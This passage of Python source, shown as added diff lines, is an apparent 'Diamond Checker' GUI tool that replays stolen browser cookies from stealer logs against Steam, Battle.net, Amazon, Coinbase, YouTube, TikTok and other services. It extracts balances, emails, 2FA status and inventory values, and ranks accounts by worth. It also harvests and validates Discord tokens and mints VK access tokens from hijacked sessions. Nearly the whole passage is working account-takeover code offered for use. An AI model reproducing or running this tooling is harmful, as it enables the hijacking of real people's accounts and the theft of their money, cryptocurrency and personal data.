{subs_count}\nCookie:{cookie_name}\n{"=" * 30}') + else: + path_to_save = 'Instagram' + self.save_results(path_to_save, 'Instagram.txt', + f'PROFILE URL - {profile_url} || PHONE_VERIF - {number_verif} || SUBSCRIBERS - {subs_count}\nCookie:{cookie_name}\n{"=" * 30}') + if settings['settings']['save_instagram_logs'] == 1: + self.save_logs(path_to_save, cookie_name, + f'PROFILE URL - {profile_url} || PHONE_VERIF - {number_verif} || SUBSCRIBERS - {subs_count}\nCookie:{cookie_name}\n{"=" * 30}') + + except Exception as err: + pass + + def check_battlenet(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'battle') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url=url_settings['services']['battlenet'], cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + auth = soup.find('div', attrs={'class': "Navbar-label Navbar-accountAuthenticated"}).text + self.save_results('BattleNet', 'BattleNet.txt', f'valid Cookie:{cookie_name}') + if settings['settings']['save_battlenet_logs'] == 1: + self.save_logs('BattleNet', cookie_name, f'valid Cookie:{cookie_name}') + except Exception as err: + pass + + def check_battlenet_games(self, cookie_name, settings): + global url_settings + try: + cookie = self.net_to_cookie(cookie_name, 'battle') + except: + cookie = {} + if len(cookie) > 1: + try: + if not os.path.exists('Battlenet_full'): + os.mkdir('Battlenet_full') + if not os.path.exists('Battlenet_full\\WithPurchases'): + os.mkdir('Battlenet_full\\WithPurchases') + session = requests.Session() + r = self.conn(obj=session.get, url='https://account.blizzard.com/oauth2/authorization/account-settings?ref=/transactions', cookies=cookie, settings=settings, headers={}) + r = self.conn(obj=session.get, url='https://eu.battle.net/oauth/authorize?response_type=code&client_id=057adb2af62a4d59904f74754838c4c8&scope=account.full commerce.virtualcurrency.full commerce.virtualcurrency.basic&state=eyJzdGF0ZUVudHJvcHkiOiJLUkJXVXdkWk5zRjM2VG1OT3RTQjhodWJxSDJCN3BCWlRWYzM4OEk5LWM4PSIsInJlZmVycmVyIjoiL3RyYW5zYWN0aW9ucyJ9&redirect_uri=https://account.blizzard.com/login/oauth2/code/account-settings®istration_id=account-settings', cookies=cookie, settings=settings, headers={}) + r = self.conn(obj=session.get, url='https://account.blizzard.com/api/transactions?regionId=2', cookies=cookie, settings=settings, headers={}) + data = r.json() + r = self.conn(obj=session.get, url='https://account.blizzard.com/api/overview', cookies=cookie, settings=settings, headers={}) + account_info = r.json() + isAuth = account_info['accountSecurityStatus']['authenticatorAttached'] + isSMSprotect = account_info['accountSecurityStatus']['smsProtectAttached'] + email = account_info['accountDetails']['email'] + text = 'Purchases:\n' + for i in data['purchases']: + text += f"{i['productTitle']} == {i['formattedTotal']}\n" + text += '\nGifts:\n' + for i in data['giftClaims']: + text += f'{i["productTitle"]}\n' + if len(data['purchases']) >= 1 or len(data['giftClaims']) >= 1: + path_to_save = 'Battlenet_full\\WithPurchases' + else: + path_to_save = 'Battlenet_full' + self.console_add_text.emit( + f'Battlenet\n{text}\nAuth - {isAuth}\nSMSprotect - {isSMSprotect}\nemail - {email}\nCookie:{cookie_name}\n{"=" * 50}\n') + self.save_results(path_to_save, 'Battlenet_full.txt', + f'{text}\nAuth - {isAuth}\nSMSprotect - {isSMSprotect}\nemail - {email}\nCookie:{cookie_name}\n{"=" * 50}\n') + if settings['settings']['save_battlenet_logs'] == 1: + self.save_logs(path_to_save, cookie_name, + f'{text}\nAuth - {isAuth}\nSMSprotect - {isSMSprotect}\nemail - {email}\nCookie:{cookie_name}\n{"=" * 50}\n') + except Exception as err: + pass + + def check_steam(self, cookie_name, settings): + global url_settings + try: + cookie = self.net_to_cookie(cookie_name, 'steam') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url='https://store.steampowered.com/account/', cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + inv_url = soup.find_all('a', attrs={'class': 'submenuitem'})[17].get('href') + profile_url = soup.find('a', attrs={'class': 'user_avatar playerAvatar offline'}).get('href') + try: + balance = soup.find('div', attrs={'class': 'accountData price'}).text + except Exception as err: + balance = 'None' + + try: + guard = soup.find('div', attrs={'class': 'account_security_block'}).find_next('div', attrs={ + 'class': 'account_data_field'}).text.replace(' ', '').replace('\n', + '') + guard = u'{0}'.format(guard) + except Exception as err: + guard = 'Information could not be obtained' + + try: + mail = soup.find_all('div', attrs={'class': 'account_setting_sub_block'})[3].find_next('span', + attrs={ + 'class': 'account_data_field'}).text + except Exception as err: + mail = '?' + + r = self.conn(obj=session.get, url=inv_url, cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + try: + items_all = soup.find('div', attrs={'class': 'games_list_tabs'}) + games = items_all.find_all_next('span', attrs={'class': 'games_list_tab_name'}) + items_count = items_all.find_all_next('span', attrs={'class': 'games_list_tab_number'}) + inventory_text = '' + for i in range(len(games)): + inventory_text += f'{games[i].text}: {items_count[i].text}\n' + except Exception as err: + items_all = 0 + games = 0 + items_count = 0 + inventory_text = 'Failed to load inventory info' + try: + r = self.conn(obj=session.get, url=f'https://csgobackpack.net/?nick={profile_url}', cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + price = soup.find('div', attrs={'class': 'well'}).find_next('p').text + except: + price = '???' + try: + r = self.conn(obj=session.get, url='https://ruststash.com/inventory/{profile_url.split("/")[3]}', cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + price_rust = soup.find('div', attrs={'class': 'well'}).find_next('p').text + except: + price_rust = '???' + self.console_add_text.emit( + f'Steam\nPROFILE URL - {profile_url} || BALANCE - {balance}\n\nINVENTORY:\n{inventory_text}\nInventory price\nCS:GO:{price}\nRust:{price_rust}\nMail:{mail}\nGuard:{guard}\nCookie:{cookie_name}\n{"=" * 30}') + self.save_results('Steam', 'Steam.txt', + f'PROFILE URL - {profile_url} || BALANCE - {balance}\n\nINVENTORY:\n{inventory_text}\nInventory price\nCS:GO:{price}\nRust:{price_rust}\nMail:{mail}\nGuard:{guard}\nCookie:{cookie_name}\n{"=" * 30}') + if settings['settings']['save_steam_logs'] == 1: + self.save_logs('Steam', cookie_name, + f'PROFILE URL - {profile_url} || BALANCE - {balance}\n\nINVENTORY:\n{inventory_text}\nMail:{mail}\nCS:GO inventory price:{price}\nGuard:{guard}\nCookie:{cookie_name}') + except Exception as err: +# print(err) + pass + + def check_youtube(self, cookie_name, settings): + youtbe_part_one = "['id-0'].resolve(" + try: + cookie = self.net_to_cookie(cookie_name, 'youtube') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url='https://studio.youtube.com/channel/?approve_browser_access=1', cookies=cookie, settings=settings, headers={}) + if '
' not in r.text: + html = r.text.split(youtbe_part_one)[1] + html = html.split(');')[0] + data = json.loads(html) + url = f"https://www.youtube.com/channel/{data['channelId']}" + subscribers = data['metric'][f"subscriberCount"] + totalVideoViewCount = data['metric']['totalVideoViewCount'] + isNameVerified = data['isNameVerified'] + isMonetized = data['isMonetized'] + channel_name = data['title'] + if settings['filters']['youtube_min_subs'] <= int(subscribers) <= settings['filters'][ + 'youtube_max_subs']: + self.console_add_text.emit( + f"Channel URL - {url}\nChannel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}\n{'=' * 30}") + now = DT.datetime.now(DT.timezone.utc).astimezone() + time_format = '%H:%M:%S' + if not os.path.exists('Youtube'): + os.mkdir('Youtube') + else: + if int(subscribers) >= int(settings['save_filters']['yt_min_subs']): + if isMonetized == True: + path_to_save = 'Youtube\\Monetized' + else: + path_to_save = f"Youtube\\Youtube_{settings['save_filters']['yt_min_subs']}+" + self.save_results(path_to_save, + f"{subscribers}подписчиков_{now:{time_format.replace(':', '-')}}.txt", + f"Channel URL - {url}\n Channel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}") + self.save_logs(path_to_save, cookie_name, + f"Channel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}") + else: + path_to_save = 'Youtube' + if isMonetized == True: + path_to_save = 'Youtube\\Monetized' + else: + path_to_save = 'Youtube' + self.save_results(path_to_save, + f"{subscribers}subscribers_{now:{time_format.replace(':', '-')}}.txt", + f"Channel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}") + if settings['settings']['save_yt_logs'] == 1: + self.save_logs(path_to_save, cookie_name, + f"Channel_name - {channel_name}\nMonetized - {isMonetized}\nVerified - {isNameVerified}\nTotalVideoViews - {totalVideoViewCount}\nSubs - {subscribers}\nCookie:{cookie_name}") + if settings['settings']['save_yt_cookies'] == 1: + self.save_cookies_yt('YT_Cookies', cookie_name, channel_name, subscribers) + else: + self.console_add_text.emit('Found YT cookie without channel') + self.save_cookies_yt('Yt_Cookies_NoChannel', cookie_name, 'No channel', '-') + except Exception as err: + try: + pass + finally: + err = None + del err + + def check_kryptex(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'kryptex') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url='https://www.kryptex.org/site/dashboard', cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + balance = soup.find('h3', attrs={'class': 'h1 line-normal mb-0'}).text + self.console_add_text.emit(f"Kryptex account: Total balance: {balance}") + text_to_insert = f"Total balance: {balance}\nCookie:{cookie_name}" + self.save_results('Kryptex', f"{balance}_{random.randint(1, 100000)}.txt", text_to_insert) + if settings['settings']['save_kryptex_logs'] == 1: + self.save_logs('Kryptex', cookie_name, text_to_insert) + except Exception as err: + try: + pass + finally: + self.err = None + del self.err + + def check_tiktok(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'tiktok') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url='https://www.tiktok.com/404?fromUrl=/me', cookies=cookie, settings=settings, headers={}) + id = r.text.split('"uniqueId":"')[1].split('"')[0] + r = self.conn(obj=session.get, url=f"https://www.tiktok.com/@{id}", cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + following = soup.find('strong', attrs={'data-e2e': 'following-count'}).text + followers = soup.find('strong', attrs={'data-e2e': 'followers-count'}).text + likes = soup.find('strong', attrs={'data-e2e': 'likes-count'}).text + if int(followers) > int(settings['save_filters']['tiktok_min_subs']): + path_to_save = f"TikTok\\TikTok_{settings['save_filters']['tiktok_min_subs']}+" + self.save_results(path_to_save, 'TikTok.txt', + f"Followers:{followers}\nLikes:{likes}\nCookie:{cookie_name}\n") + else: + path_to_save = 'TikTok' + self.save_results('TikTok', f"{followers} followers_{id}.txt", + f"Followers:{followers}\nLikes:{likes}\nCookie:{cookie_name}\n") + if settings['settings']['save_tiktok_logs'] == 1: + self.save_logs(path_to_save, cookie_name, + f"Followers:{followers}\nLikes:{likes}\nCookie:{cookie_name}\n") + except Exception as err: + try: + pass + finally: + self.err = None + del self.err + + def check_pathofexile(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'pathofexile') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + characters = '' + r = self.conn(obj=session.get, url='https://ru.pathofexile.com/character-window/get-characters', cookies=cookie, settings=settings, headers={}) + data = r.json() + for i in data: + characters += f"{i['name']} | league:{i['league']} | level:{i['level']}\n" + + r = self.conn(obj=session.get, url='https://ru.pathofexile.com/my-account', cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + money = soup.find('span', attrs={'class': 'amount shopCurrentCoinValue account'}).text + account_name = r.text.split('var a = new A({"name":"')[1].split('"')[0] + r = self.conn(obj=session.get, url=f"https://ru.pathofexile.com/character-window/get-stash-items?accountName={account_name}&realm=pc&league=Heist&tabs=1&tabIndex=0", cookies=cookie, settings=settings, headers={}) + tabs_count = r.json()['numTabs'] + self.console_add_text.emit('Path Of Exile account!') + text_to_insert = f"{'=============================='}\n\nBalance: {money}\nThe number of tabs in the inventory: {tabs_count}\nCharacters:\n{characters}\nCookie:{cookie_name}\n{'=============================='}\n\n" + self.save_results('PathOfExile', 'Poe_info.txt', text_to_insert) + if settings['settings']['save_pathofexile_logs'] == 1: + self.save_logs('PathOfExile', cookie_name, + f"{'=============================='}\n\nBalance: {money}\nThe number of tabs in the inventory: {tabs_count}\nCharacters:\n{characters}\nCookie:{cookie_name}\n{'=============================='}\n\n") + except: + pass + + def check_hitbtc(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'hitbtc') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + header = {'x-csrf-token': cookie['csrf']} + r = self.conn(obj=session.get, url='https://hitbtc.com/sub-accounts/transfer-emails-list', cookies=cookie, settings=settings, headers={}) + data = r.json() + email = data['data'][0]['email'] + self.save_results('HitBTC', 'HitBTC.txt', f"Valid session with mail {email}\nCookie:{cookie_name}\n") + if settings['settings']['save_hitbtc_logs'] == 1: + self.save_logs('HitBTC', cookie_name, f"Valid session with mail {email}\nCookie:{cookie_name}\n") + self.console_add_text.emit('found HIT BTC!') + except: + pass + + def check_amazon(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'amazon') + except: + cookie = {} + if len(cookie) > 1: + try: + domains = ["ca", "com.br", "com", "de", "sg", "ae", "com.tr", "in", "com.au", "co.uk", "cn", "fr", "it", + "co.jp", "pl", "es", "nl"] + for domain in domains: + session = requests.Session() + r = self.conn(obj=session.get, url=f'https://www.amazon.{domain}/ref=nav_logo', cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + pattern = re.compile(r"'config.customerName','(.*?)'\);", re.MULTILINE | re.DOTALL) + script = soup.find("script", text=pattern) + if script != None: + account_name = pattern.search(script.text).group(1) + account_address = soup.find('span', attrs={'class': 'nav-line-2 nav-progressive-content'}).text + try: + account_date = soup.find('p', attrs={'class': 'a-size-base truncate-1line'}).text + except: + account_date = "NONE" + self.console_add_text.emit(account_address) + self.save_results('Amazon', 'Amazon.txt', + f'Domain: {r.url}\nCookie: {cookie_name}\nAccount name: {account_name}\nAccount address: {account_address}Account date create: {account_date}\n{"=" * 100}\n') + if settings['settings']['save_amazon_logs'] == 1: + shutil.copytree(self.get_path(cookie_name), + "Amazon"+"\\"+domain+"\\"+self.get_path(cookie_name).split("\\")[1]) + self.save_results("Amazon"+"\\"+domain+"\\"+self.get_path(cookie_name).split("\\")[1], 'Amazon_checked_info.txt', f'Domain: https://www.amazon.{domain}\nCookie: {cookie_name}\nAccount name: {account_name}\nAccount address: {account_address}Account date create: {account_date}\n{"=" * 100}\n') + else: + script = 'poshel nahyi oshibka ebanaya ebalo y tebya none' + except: + pass + + def check_coinbase(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'coinbase') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url='https://www.coinbase.com/api/v2/hold-balances', cookies=cookie, settings=settings, headers={}) + data = json.loads(r.text) + balance = f"{data['data']['total_portfolio_balance']['amount']}{data['data']['total_portfolio_balance']['currency']}" + self.save_results('Coinbase', 'Coinbase.txt', f'Balance: {balance}\nCookie:{cookie_name}') + if settings['settings']['save_coinbase_logs'] == 1: + shutil.copytree(self.self.get_path(cookie_name), + f'Coinbase\\{self.get_path(cookie_name).replace("data", "")}') + self.save_results(f'Coinbase\\{self.get_path(cookie_name).replace("data", "")}', + 'Coinbase_checked_info.txt', + f'Balance: {balance}\nCookie:{cookie_name}') + except Exception as err: + pass + + def check_humble(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'humblebundle') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url='https://www.humblebundle.com/user/wallet?hmb_source=navbar', cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + balance = soup.find('div', attrs={'class': 'balance'}).text + self.save_results('Humble', 'Humblebundle.txt', f'Cookie:{cookie_name}{balance}{"=" * 40}') + if settings['settings']['save_humble_logs'] == 1: + shutil.copytree(self.get_path(cookie_name), + f'Humble\\{self.get_path(cookie_name).replace("data", "")}') + self.save_results(f'Humble\\{self.get_path(cookie_name).replace("data", "")}', + 'Humble_checked_info.txt', + f'Cookie:{cookie_name}{balance}') + except: + pass + + def check_free_bitcoin(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'freebitco.in') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url='https://freebitco.in/', cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + balance = soup.find('span', attrs={'id': 'balance'}).text + self.console_add_text.emit(f'Balance: {balance} BTC \nCookie:{cookie_name}') + if not os.path.exists('Freebtc'): + os.mkdir('Freebtc') + if float(balance) > float(settings['save_filters']['freebtc_min_balance']): + path_to_save = f"Freebtc\\Freebtc_{settings['save_filters']['freebtc_min_balance']}+" + self.save_results(path_to_save, 'freebitcoin.txt', f'Balance: {balance}\nCookie:{cookie_name}') + else: + path_to_save = 'Freebtc' + self.save_results(path_to_save, 'freebitcoin.txt', f'Balance: {balance}\nCookie:{cookie_name}') + if settings['settings']['save_freebtc_logs'] == 1: + self.save_logs(path_to_save, cookie_name, 'Balance: {balance}\nCookie:{cookie_name}') + except: + pass + + def get_vk_token(self, cookie, settings): + try: + session = requests.Session() + url = 'https://oauth.vk.com/authorize?client_id=6121396&scope=501202911&redirect_uri=https://oauth.vk.com/blank.html&display=page&response_type=token&revoke=1' + r = self.conn(obj=session.get, url=url, cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + pattern = re.compile(r'location.href = "(.*?)"\+addr;', re.MULTILINE | re.DOTALL) + script = soup.find("script", text=pattern) + link = pattern.search(script.text).group(1) + r = self.conn(obj=session.get, url=link, cookies=cookie, settings=settings, headers={}) + soups = bs(r.text, 'html.parser') + pattern = re.compile(r"location.href='(.*?)';", re.MULTILINE | re.DOTALL) + script = soups.find("script", text=pattern) + access_token = pattern.search(script.text).group(1) + token = access_token.split('token=')[1] + token = token.split('&')[0] + self.save_results(folder_name='VK_tokens', file_name='tokens.txt', text_to_insert=f'{token}') + except Exception as err: +# self.console_add_text.emit("Mistake vk_token:" + self.err) + pass + + def get_user_info(self, token, settings): + try: + idlist = [] + session = requests.Session() + url = "https://discordapp.com/api/v7/users/@me?verified" + headers = {"authorization": token} + r = self.conn(obj=session.get, url=url, cookies=None, settings=settings, headers=headers) + if r.status_code == 200: + json_response = r.json() + if json_response["id"] not in idlist: + idlist.append(json_response["id"]) + if json_response["verified"] == True: + return True + else: + return False + else: + return "sameToken" + else: + return None + except Exception as err: + print(err) + # self.console_add_text.emit("Mistake vk_token:" + self.err) + pass + + def get_plan_id(self, token, settings): + try: + session = requests.Session() + for json in self.conn(obj=session.get, url="https://discord.com/api/v7/users/@me/billing/subscriptions", cookies=None, settings=settings, headers={"authorization": token}).json(): + try: + if json["plan_id"] == "511651880837840896": + return True + else: + return False + except: + return None + except Exception as err: + print(err) + # self.console_add_text.emit("Mistake vk_token:" + self.err) + pass + + def get_payment_id(self, token, settings): + try: + session = requests.Session() + for json in self.conn(obj=session.get, url="https://discordapp.com/api/v7/users/@me/billing/payment-sources", cookies=None, settings=settings, headers={"authorization": token}).json(): + try: + if json["invalid"] == True: + return True + else: + return False + except: + return None + except Exception as err: + print(err) + # self.console_add_text.emit("Mistake vk_token:" + self.err) + pass + + def check_discord(self, cookie_name, settings): + try: + if not os.path.exists("Discord"): + os.makedirs("Discord") + + dirValidTokens = f"Discord/valid.txt" + dirUnverifiedTokens = f"Discord/unverified.txt" + dirSameTokens = f"Discord/sameTokens.txt" + dirInvalidTokens = f"Discord/invalid.txt" + dirNitroTokens = f"Discord/nitro.txt" + tokens = [] + + for line in [x.strip() for x in open(f"{cookie_name}", errors="ignore").readlines() if + x.strip()]: # cookie_name this is a file that it devours and runs for tokens + for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"): + for token in re.findall(regex, line): + tokens.append(token) + + tokens = list(dict.fromkeys(tokens)) + for token in tokens: + user_info = self.get_user_info(token, settings) + if user_info == "sameToken": + with open(dirSameTokens, "a", encoding="utf-8") as f: + f.write(token + "\n") + + else: + if user_info == None: + with open(dirInvalidTokens, "a", encoding="utf-8") as f: + f.write(token + "\n") + elif user_info == True: + with open(dirValidTokens, "a", encoding="utf-8") as f: + f.write(token + "\n") + planid = self.get_plan_id(token, settings) + payid = self.get_payment_id(token, settings) + if planid != None or payid != None: + with open(dirNitroTokens, "a", encoding="utf-8") as f: + f.write(token + "\n") + self.console_add_text.emit(f"{token} | Nitro") + else: + self.console_add_text.emit(f"{token} | Valid") + else: + with open(dirUnverifiedTokens, "a", encoding="utf-8") as f: + f.write(token + "\n") + self.console_add_text.emit(f"{token} | Unverified") + except Exception as err: + print(err) + # self.console_add_text.emit("Mistake vk_token:" + self.err) + pass + + def check_genshin(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'mihoyo') + except: + cookie = {} + if len(cookie) > 1: + try: + r = self.conn(requests.post, url='https://api-os-takumi.mihoyo.com/community/user/wapi/userInfoEdit', settings=settings, headers={}, cookies=cookie, data='{"avatar":"100108","avatar_url":"","gender":0,"introduce":""}') + jj = r.json()['message'] + if jj == 'OK': + print('Working, message from server: {}'.format(jj)) + except Exception as err: + print(err) + pass + + + + + def run(self): + settings = Config().settings_reader() + global all_cooks + + all_cooks = self.files_reader(settings['settings']['dir_logs']) + + if settings['settings']['PROXY'] != "off": + self.get_proxies_from_file(settings) + else: + self.console_add_text.emit(f'Proxies are disabled\n') + global useragents + useragents = self.select_useragent_mode(settings) + + THR = settings['settings']['THR'] + threads = len(all_cooks) // THR + start = 0 + end = threads + + for i in range(0, THR): + threading.Thread(target=self.check_all, args=(all_cooks, start, end, settings)).start() + if i != THR - 1: + start += threads + end += threads + threading.Thread(target=self.check_all, args=(all_cooks, end, len(all_cooks), settings)).start() + + +class MainWindowChecker(QtWidgets.QMainWindow): + def __init__(self): + super(MainWindowChecker, self).__init__() + self.checking = CheckThread() + self.ui = main_ui.Ui_MainWindow() + self.ui.setupUi(self) + self.init_UI() + self.checking.console_add_text.connect(self.console) + self.checking.info_progress.connect(self.info_r) + self.checking.progres_setup.connect(self.progres_set) + + def info_r(self, info): + # Handle the info received + if info.service_name in self.cookie_counts: + self.cookie_counts[info.service_name] += info.cookie_count + else: + self.cookie_counts[info.service_name] = info.cookie_count + + # Perform additional operations based on the received info + print("Received info:", info) + print("Cookie counts:", self.cookie_counts) + + def init_UI(self): + + settings = Config().settings_reader() + + self.setWindowTitle('💎 Diamond Checker - Opensourced.Pro') + self.setWindowIcon(QIcon('diamond.ico')) + + self.ui.spinBox_thr.setValue(settings['settings']['THR']) + + self.ui.checkBox_ua.setCheckState(settings['settings']['USERAGENT']) + self.ui.checkBox_steam.setCheckState(settings['services']['STEAM']) + self.ui.checkBox_instagram.setCheckState(settings['services']['INSTAGRAM']) + self.ui.checkBox_funpay.setCheckState(settings['services']['FUNPAY']) + self.ui.checkBox_netflix.setCheckState(settings['services']['NETFLIX']) + self.ui.checkBox_roblox.setCheckState(settings['services']['ROBLOX']) + self.ui.checkBox_freebitcoin.setCheckState(settings['services']['FREEBITCOIN']) + self.ui.checkBox_battlenet.setCheckState(settings['services']['BATTLE']) + self.ui.checkBox_amazon.setCheckState(settings['services']['AMAZON']) + self.ui.checkBox_humble.setCheckState(settings['services']['HUMBLE']) + self.ui.checkBox_kryptex.setCheckState(settings['services']['KRYPTEX']) + self.ui.checkBox_coinbase.setCheckState(settings['services']['COINBASE']) + self.ui.checkBox_pathofexile.setCheckState(settings['services']['PATHOFEXILE']) + self.ui.checkBox_hitbtc.setCheckState(settings['services']['HITBTC']) + self.ui.checkBox_tiktok.setCheckState(settings['services']['TIKTOK']) + self.ui.checkBox_youtube.setCheckState(settings['services']['YT']) + self.ui.checkBox_discord.setCheckState(settings['services']['DISCORD']) + self.ui.checkBox_vk.setCheckState(settings['services']['VK']) + self.ui.facebookads__checkbox.setCheckState(settings['services']['FACEBOOK']) + self.ui.snapchat_ads_checkbox.setCheckState(settings['services']['SNAPCHATADS']) + self.ui.tinder_ads_checkbox.setCheckState(settings['services']['TINDERADS']) + self.ui.twitter_ads_checkbox.setCheckState(settings['services']['TWITTERADS']) + self.ui.craigslist_ads_checkbox.setCheckState(settings['services']['CRAIGSLISTADS']) + self.ui.airbnb_checkbox.setCheckState(settings['services']['AIRBNB']) + self.ui.microsoft_ads_checkbox.setCheckState(settings['services']['MICROSOFTADS']) + self.ui.walmart_checkbox.setCheckState(settings['services']['WALMART']) + self.ui.uber_eats_checkbox.setCheckState(settings['services']['UBEREATS']) + self.ui.zillow_checkbox.setCheckState(settings['services']['ZILLOW']) + self.ui.flipkart_checkbox.setCheckState(settings['services']['FLIPKART']) + self.ui.dh_gate_checkbox.setCheckState(settings['services']['DHGATE']) + self.ui.instacart_checkbox.setCheckState(settings['services']['INSTACART']) + self.ui.ashley_madison_checkbox.setCheckState(settings['services']['ASHLEYMADISON']) + self.ui.zoosk_checkbox.setCheckState(settings['services']['ZOOSK']) + self.ui.christan_mingle_checkbox.setCheckState(settings['services']['CHRISTANMINGLE']) + self.ui.vinted_checkbox.setCheckState(settings['services']['VINTED']) + self.ui.booking_checkbox.setCheckState(settings['services']['BOOKING']) + self.ui.temu_checkbox.setCheckState(settings['services']['TEMU']) + self.ui.kick_checkbox.setCheckState(settings['services']['KICK']) + self.ui.myspace_checkbox.setCheckState(settings['services']['MYSPACE']) + self.ui.snapchat_ads_checkbox.setCheckState(settings['services']['SNAPCHAT']) + self.ui.twitch_checkbox.setCheckState(settings['services']['TWITCH']) + self.ui.localsapp_checkbox.setCheckState(settings['services']['LOCALS']) + self.ui.linkedin_checkbox.setCheckState(settings['services']['LINKEDIN']) + self.ui.progressBar.setValue(0) + self.ui.comboBox_proxy.activated.connect(self.proxy_select) + self.ui.lineEdit_dir.setText(settings['settings']['dir_logs']) + self.ui.lineEdit_proxy.setText(settings['settings']['proxies_file']) + self.ui.lineEdit_ua.setText(settings['settings']['useragents_file']) + self.ui.pushButton.clicked.connect(self.check) + + def select_directory(self): + directory = QFileDialog.getExistingDirectory(self, 'Select Directory') + if directory: + self.crawl_directory(directory) + + def crawl_directory(self, directory): + cookies_count = 0 + files_with_cookies = [] + + for root, dirs, files in os.walk(directory): + for file in files: + file_path = os.path.join(root, file) + if self.contains_cookies(file_path): + cookies_count += 1 + files_with_cookies.append(file_path) + + self.textEdit_console.clear() + self.textEdit_console.append('Files with Cookies:') + for file_path in files_with_cookies: + self.textEdit_console.append(file_path) + + self.number_of_label.setText(f'Number of Cookies: {cookies_count}') + def contains_cookies(file_path): + with open(file_path, 'r') as file: + content = file.read() + + # Define a regular expression pattern to match cookies + cookie_pattern = r'(?i)\bcookie\b' + + # Use the re.search() function to search for the pattern in the file content + if re.search(cookie_pattern, content): + return True + else: + return False + + + def proxy_select(self, index): + settings = Config().settings_reader() + settings['settings']['PROXY'] = self.ui.comboBox_proxy.itemText(index) + Config().settings_write(settings) + + @staticmethod + def contains_cookies(file_path): + def search_cookies_in_line(line): + # Define a regular expression pattern to match cookies + cookie_pattern = r'(?i)\bcookie\b' + + # Use the re.search() function to search for the pattern in the line + if re.search(cookie_pattern, line): + return True + + return False + + with open(file_path, 'r', encoding='utf-8', errors='ignore') as file: + for line in file: + if search_cookies_in_line(line): + return True + + return False + + def count_cookies_in_directory(self, directory): + cookies_count = 0 + + for root, dirs, files in os.walk(directory): + for file in files: + file_path = os.path.join(root, file) + if self.contains_cookies(file_path): + cookies_count += 1 + + return cookies_count + + + def dir_logs(self): + options = QFileDialog.Options() + folderName = QFileDialog.getExistingDirectory(self, "Directory Dialog", "", options=options) + if folderName: + settings = Config().settings_reader() + settings['settings']['dir_logs'] = folderName + Config().settings_write(settings) + self.ui.lineEdit_dir.setText(settings['settings']['dir_logs']) + + cookies_count = self.count_cookies_in_directory(folderName) + print(f"Total number of cookies: {cookies_count}") + + def proxies_file(self): + options = QFileDialog.Options() + fileName = QFileDialog.getOpenFileName(self, "QFileDialog.getOpenFileName()", "", "*.txt", options=options) + if fileName: + settings = Config().settings_reader() + settings['settings']['proxies_file'] = fileName[0] + Config().settings_write(settings) + self.ui.lineEdit_proxy.setText(settings['settings']['proxies_file']) + + def useragents_file(self): + options = QFileDialog.Options() + fileName = QFileDialog.getOpenFileName(self, "QFileDialog.getOpenFileName()", "", "*.txt", options=options) + if fileName: + settings = Config().settings_reader() + settings['settings']['useragents_file'] = fileName[0] + Config().settings_write(settings) + self.ui.lineEdit_ua.setText(settings['settings']['useragents_file']) + + def check(self): + settings = Config().settings_reader() + settings['settings']['THR'] = int(self.ui.spinBox_thr.text()) + settings['settings']['USERAGENT'] = int(self.ui.checkBox_ua.checkState()) + settings['services']['STEAM'] = int(self.ui.checkBox_steam.checkState()) + settings['services']['INSTAGRAM'] = int(self.ui.checkBox_instagram.checkState()) + settings['services']['FUNPAY'] = int(self.ui.checkBox_funpay.checkState()) + settings['services']['NETFLIX'] = int(self.ui.checkBox_netflix.checkState()) + settings['services']['ROBLOX'] = int(self.ui.checkBox_roblox.checkState()) + settings['services']['FREEBITCOIN'] = 